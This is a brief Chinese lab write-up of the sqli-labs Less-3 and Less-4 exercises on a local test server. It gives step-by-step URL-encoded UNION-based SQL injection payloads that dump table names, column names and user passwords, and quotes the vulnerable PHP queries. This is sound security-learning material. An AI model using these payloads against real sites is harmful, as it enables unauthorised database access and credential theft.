當我們在網址之後寫上‘的時候
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1%27
提示錯誤
他說有括號,然後後面還有一些其他的
於是繼續加上括號,並且忽略其他的
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1’) --+
成功訪問,於是就剩下正常的步驟來寫網址了
- 爆列數以及顯示回顯位
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=1%27)%20%20order%20by%203%20%20–+
結果是3列
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,2,3%20–+
回顯位2,3 - 爆數據庫
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),version()%20–+
- 爆表名
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),group_concat(table_name)%20from%20information_schema.tables%20where%20%20table_schema=0x7365637572697479–+
-
爆字段名
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20%20union%20select%201,database(),group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=0x7365637572697479%20and%20table_name=0x7573657273–+
-
爆賬戶
http://127.0.0.1/sqli-labs-kali2/Less-3/?id=-1%27)%20union%20select%201,group_concat(username),group_concat(password)%20from%20users%20–+
第二題
http://127.0.0.1/sqli-labs-kali2/Less-4/?id=1%22
報錯 提示括號,所以加上括號並且忽略之後的字符
http://127.0.0.1/sqli-labs-kali2/Less-4/?id=1%22)%20–+
訪問成功
其他的都是在上面的數據上構造,不詳細寫了
分析
- 看第一題PHP的源碼
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
構造主要是滿足括號
- 看第二題PHP源碼
$id = '"' . $id . '"';
$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1";
構造主要是滿括號